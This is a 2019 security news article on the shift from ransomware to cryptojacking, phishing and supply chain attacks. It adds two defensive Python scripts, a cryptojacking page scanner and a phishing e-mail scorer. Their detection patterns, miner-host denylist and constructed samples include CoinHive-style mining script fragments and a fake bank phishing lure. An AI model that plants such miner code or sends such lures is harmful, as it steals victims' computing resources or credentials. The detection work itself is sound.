Security Experts Warn That Ransomware Creators Are Going Phishing

Ransomware Creators Turn To Phishing

On May 12, 2017, the WannaCry ransomware encrypted the files of over 200,000 Windows PCs in more than 150 countries and caused damages estimated in the hundreds of millions of dollars. Thanks to EternalBlue, an exploit for Windows' SMBv1 service allegedly developed by the NSA and leaked by the Shadow Brokers a month earlier, WannaCry spread on its own like a worm, with nobody having to open an attachment, and affected users and organizations of all shapes and sizes. Fortunately, a security researcher by the name of Marcus Hutchins halted the outbreak by registering the then-unregistered "kill switch" domain that the malware checked before encrypting anything, but the impact was still significant enough to get the mainstream media talking about ransomware.

On June 27, 2017, exactly 46 days later, the headlines were occupied by NotPetya, another malware strain that demanded a ransom. NotPetya reused EternalBlue for lateral movement, but its initial foothold came from a trojanized update of M.E.Doc, a Ukrainian accounting package, which is a supply chain attack of the kind discussed later in this article. As later analysis revealed, it was not really ransomware at all but a wiper dressed up as one: victims who paid had no realistic way of getting their files back. It acted like ransomware, though, and a second outbreak in the span of a month and a half meant that people were suddenly taking the threat a lot more seriously.

WannaCry and NotPetya were just two of the countless file-encrypting malware families that appeared in 2016 and 2017. Ransomware was all the rage in the cyber underground at the time, and many experts thought that, because of the high profitability, crooks would continue to use it prolifically in the years to come. As it happens, they weren't quite right.

Ransomware is taking a back seat

For over a decade, Microsoft has used telemetry from its customers to gain a better understanding of the forces that shape the cybersecurity landscape and the changes that happen within it. Recently, the OS developer released the latest volume of its Security Intelligence Report, covering 2018, and pointed out that, surprisingly or not, over the last couple of years there has been a distinct move away from ransomware. Between March 2017 and December 2018, Microsoft saw a roughly 60% decrease in ransomware encounters.

These figures come from a very large installed base, so they are a reasonable gauge of the trend, with the caveat that telemetry of this kind only counts what Microsoft's own products saw and blocked. Even if you don't trust them, however, reports from other companies also confirm that cybercriminals are actively investing time and effort into non-ransomware attacks which, while not as destructive, can be just as (if not more) profitable.

Cryptocurrency mining gains popularity

Most of you probably remember the astronomical surge in value that cryptocurrencies of various description experienced in 2017, when Bitcoin alone went from under $1,000 to nearly $20,000 by December. Prices peaked, and people started thinking that owning some digital coins would make them incredibly wealthy.

The thing is, mining cryptocurrency on your own hardware requires a significant initial investment and results in a hefty electricity bill. If you're using other people's PCs, however, someone else pays for both.

Microsoft's report shows that shortly after the price of crypto coins shot up, crooks started using mining malware quite extensively. Initially, the miners were executables distributed through the traditional attack vectors, but at one point the criminals realized that compromising a legitimate website and embedding cryptocurrency-mining JavaScript in it could deliver better results. The script uses visitors' CPUs to grind through proof-of-work hashes (most such miners, CoinHive included, mined Monero, whose algorithm ran acceptably on ordinary processors), and the proceeds go to the crooks' wallet. Apart from the poorer performance, the fan noise and the increased electricity consumption, there's nothing immediately visible that can alert the user, and the mining stops the moment the tab is closed, which makes it hard to pin down.
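As an added example (not code from the article or from Microsoft's report), the following Python script flags the pattern just described in a fetched page: a script loaded from a known miner host, or an inline script that opens a WebSocket and also instantiates WebAssembly, names a proof-of-work protocol, or constructs a CoinHive miner object. The host list, the indicator patterns and the three sample pages are assumptions constructed for the demonstration.

```python
"""Flag in-browser cryptocurrency-mining scripts in an HTML page.

Added example; not code from the article or from Microsoft's report.
The miner host list and the inline-script indicators are assumptions modelled
on the Coinhive-style miner described in the text (a third-party script, a
miner object started with a site key, a WebSocket to a mining proxy, and
WebAssembly hashing). The sample pages at the bottom are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed denylist of script hosts associated with in-browser miners.
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "crypto-loot.com"}

# Indicators looked for inside inline <script> bodies.
INLINE_PATTERNS = {
    "miner-api": re.compile(r"\bCoinHive\.(Anonymous|User)\s*\("),
    "websocket": re.compile(r"\bnew\s+WebSocket\s*\(\s*['\"]wss?://"),
    "wasm": re.compile(r"\bWebAssembly\.(instantiate|compile)\b"),
    "pow-protocol": re.compile(r"cryptonight|stratum", re.IGNORECASE),
}


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # list while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def script_host(src, page_url):
    """Hostname a script is loaded from; relative paths resolve to the page host."""
    return urlparse(src).hostname or urlparse(page_url).hostname


def scan_page(html, page_url):
    """Return a list of (indicator, evidence) findings for the page."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        if script_host(src, page_url) in MINER_HOSTS:
            findings.append(("known-miner-host", src))
    for body in collector.inline:
        hits = {name for name, pat in INLINE_PATTERNS.items() if pat.search(body)}
        # A WebSocket alone is normal (chat, live updates); it only counts as
        # mining behaviour alongside a miner API, WASM hashing or a PoW protocol.
        if "websocket" in hits and hits & {"miner-api", "wasm", "pow-protocol"}:
            findings.append(("miner-behaviour", ",".join(sorted(hits))))
        elif "miner-api" in hits:
            findings.append(("miner-api", "CoinHive object constructed"))
    return findings


def is_cryptojacked(html, page_url):
    return bool(scan_page(html, page_url))


# Constructed sample pages (not real sites).
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><script>
var sock = new WebSocket('wss://chat.example.org/ws');
sock.onmessage = function (e) { document.title = e.data; };
</script></body></html>"""

COINHIVE_PAGE = """<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER');
miner.start();
</script></body></html>"""

SELF_HOSTED_PAGE = """<html><body>
<script src="/assets/vendor.js"></script>
<script>
// miner logic served from the compromised site itself
WebAssembly.instantiate(hashBytes).then(function (m) {
  var pool = new WebSocket('wss://pool.example.net/proxy');
  pool.onopen = function () { pool.send('{"method":"stratum.login"}'); };
});
</script></body></html>"""

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("coinhive", COINHIVE_PAGE),
                       ("self-hosted", SELF_HOSTED_PAGE)]:
        print(name, scan_page(page, "https://www.example.org/index.html"))
```

A single WebSocket is deliberately not enough on its own: chat widgets and live dashboards use them too, which is why the heuristic requires a second mining indicator before it reports anything.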

Compare illicit cryptocurrency mining to ransomware, and you'll see why the former overtook the latter. It's a far quieter attack that can remain undetected for much longer. More importantly, its success doesn't depend on whether the victim has a solid backup strategy or is willing to negotiate with criminals; every minute of CPU time pays, whether or not anyone notices.

As Microsoft's report points out, there are a few other reasons why crooks like cryptocurrency miners, but it must be said that this love affair is unlikely to last long. For one, CoinHive, the most popular in-browser miner, shut down in March 2019, and although there are other similar tools and services available, none of them seems to be anywhere near as widespread. This isn't incredibly surprising considering the massive decrease in value that digital coins have experienced over the last year or so. The profit margin is much slimmer now, which means that cryptocurrency mining, like many other malicious activities, might be reaching its "Best Before" date. Some things in the cybersecurity world never grow old, though.

Phishing and supply chain attacks are still favored by cybercriminals

Regardless of whether a hacker chooses a strain of ransomware or a cryptocurrency miner as their weapon of choice, they need an initial infection vector. Phishing is one of the oldest and most popular ways of gaining unauthorized access to a computer, and it would appear that most crooks have no intention of switching to anything else. In fact, Microsoft reported that between January and December 2018, the share of inbound messages it identified as phishing grew by 250%.

Phishing has always been (and will likely continue to be) an incredibly successful infection vector because it targets people rather than software: subjected to the right social engineering, a user will click a link, open a file, or hand over credentials, and no patch fixes that. The lures are rarely sophisticated; a spoofed display name, a Reply-To pointing somewhere else, and a link whose visible text names a trusted site while the href goes elsewhere are usually enough. Some criminals, however, have opted for an approach that doesn't involve that much social engineering.
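An added example, again not code from the article: a small triage script, using only Python's standard library, that scores an inbound e-mail for the tells phishing lures rely on. The two messages, the domains in them and the two-finding threshold are constructed for the demonstration.

```python
"""Score an inbound e-mail for the tells that phishing lures rely on.

Added example (not from the article); standard library only. Checks:
a display name that names a different domain than the real sender address,
a Reply-To that diverts replies to another domain, a failed SPF/DKIM/DMARC
verdict in Authentication-Results, and links whose visible text names a
different host than their href. The sample messages and domains are
constructed for this demonstration; the two-finding threshold is a guess.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

ANCHOR_RE = re.compile(r'<a\s[^>]*href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', re.I | re.S)
HOST_RE = re.compile(r'\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b', re.I)
TAG_RE = re.compile(r'<[^>]+>')


def registrable(host):
    """Organisation part of a host name: its last two labels.
    Assumption: no public-suffix list, so co.uk-style suffixes are not handled."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def text_bodies(msg):
    """Concatenate the text/plain and text/html parts of a message."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    out = []
    for part in parts:
        if part.get_content_type() in ("text/plain", "text/html"):
            raw = part.get_payload(decode=True) or b""
            out.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(out)


def phishing_indicators(raw_message):
    """Return a list of (indicator, evidence) pairs found in the message."""
    msg = message_from_string(raw_message)
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(addr)

    # 1. The display name claims one domain while the address lives in another.
    for host in HOST_RE.findall(name):
        if registrable(host) != registrable(from_dom):
            findings.append(("display-name-domain-mismatch", f"{host} vs {from_dom}"))

    # 2. Replies are diverted to a domain other than the sender's.
    reply_dom = domain_of(parseaddr(msg.get("Reply-To", ""))[1])
    if reply_dom and registrable(reply_dom) != registrable(from_dom):
        findings.append(("reply-to-mismatch", reply_dom))

    # 3. The receiving mail server recorded an authentication failure.
    auth = msg.get("Authentication-Results", "")
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth, re.I)
        if m and m.group(1).lower() in ("fail", "softfail", "permerror"):
            findings.append((f"{mech}-{m.group(1).lower()}", auth.strip()))

    # 4. The link text names a host the href does not actually go to.
    for href, text in ANCHOR_RE.findall(text_bodies(msg)):
        href_host = urlparse(href).hostname or ""
        for host in HOST_RE.findall(TAG_RE.sub("", text)):
            if registrable(host) != registrable(href_host):
                findings.append(("link-text-host-mismatch", f"{host} -> {href_host}"))
    return findings


def is_suspicious(raw_message, threshold=2):
    return len(phishing_indicators(raw_message)) >= threshold


# Constructed messages; no real organisations or domains are referenced.
PHISH_SAMPLE = """From: "Example Bank Security - example-bank.com" <no-reply@secure-verify.example.net>
To: victim@example.com
Reply-To: collector@reply-harvest.example.org
Subject: Your account has been limited
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=secure-verify.example.net; dkim=none
Content-Type: text/html; charset="utf-8"

<p>Please confirm your details at
<a href="http://secure-verify.example.net/login">https://www.example-bank.com/account</a></p>
"""

LEGIT_SAMPLE = """From: "Example Bank" <notices@example-bank.com>
To: customer@example.com
Subject: Your statement is ready
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example-bank.com; dkim=pass header.d=example-bank.com
Content-Type: text/html; charset="utf-8"

<p>Your statement is at <a href="https://www.example-bank.com/statements">www.example-bank.com/statements</a>.</p>
"""

if __name__ == "__main__":
    for label, sample in (("phish", PHISH_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(label, is_suspicious(sample), phishing_indicators(sample))
```

None of these checks is conclusive alone (marketing platforms legitimately set a foreign Reply-To, and SPF softfails on forwarded mail), which is why the verdict counts findings rather than stopping at the first one; in a real gateway the weights would come from your own mail flow.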

Microsoft explains that last year also saw an uptick in the number of supply chain attacks. In a supply chain attack, hackers compromise the developer of a popular software application and tamper with the application (or its build or update process) so that it behaves in a way it's not supposed to. In the most noteworthy example of recent years, Piriform, the creator of a popular system optimization app called CCleaner, was compromised in 2017, and as a result close to 2.3 million users inadvertently downloaded a backdoored version through the normal distribution channel. The trojanized build carried a valid Piriform code-signing signature, so the checks that installers and updaters normally rely on passed. Software updates nowadays are, for the most part, completely automated, and people tend to trust them, which means that victims are unlikely to figure out that something's not quite right until it's already too late.

It shouldn't really be news to anyone that the threat landscape doesn't sit still. Ransomware fell out of favor and was replaced by cryptocurrency miners, which will sooner or later be replaced by something else. All these changes mean that no automated tool protects against every single threat, which is why keeping our wits about us when we're browsing the web and reading e-mail is more important than ever.

May 20, 2019